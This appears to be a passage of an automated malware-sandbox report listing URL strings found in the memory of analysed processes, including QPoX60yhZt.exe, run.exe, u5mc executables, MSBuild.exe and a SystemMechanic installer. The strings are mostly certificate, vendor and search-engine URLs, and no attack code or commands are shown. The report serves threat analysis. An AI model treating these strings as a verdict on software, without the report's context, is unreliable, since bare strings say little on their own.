Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://download.iolo.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
Source: run.exe, run.exe, 00000002.00000002.1851199040.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1781422592.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000000.2132304102.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2222284891.00000000002EC000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://google.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: MSBuild.exe, 0000000D.00000002.2895391729.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000003.2115855252.00000000023EB000.00000004.00001000.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u5mc.3.exe, 00000005.00000003.2115855252.00000000023F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: u5mc.3.exe, 00000005.00000003.2115855252.0000000002416000.00000004.00001000.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000003.2115855252.00000000024B4000.00000004.00001000.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000003.2115855252.0000000002479000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969194740.00000195253D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/CompositeWPF
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/prism
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2956758607.0000019524BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp, u5mc.3.exe, 00000005.00000000.1816333516.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u5mc.3.exe, 00000005.00000003.2115855252.0000000002472000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: run.exe, 00000002.00000002.1852865451.0000000003F33000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051AD000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.000000000393F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
Source: u5mc.0.exe, u5mc.0.exe, 00000001.00000002.2187775846.000000006BA8D000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2187629320.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000003066000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000003066000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000003066000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000003066000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/f
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.avira.com/download/
Source: u5mc.3.exe, 00000005.00000003.2115855252.0000000002434000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
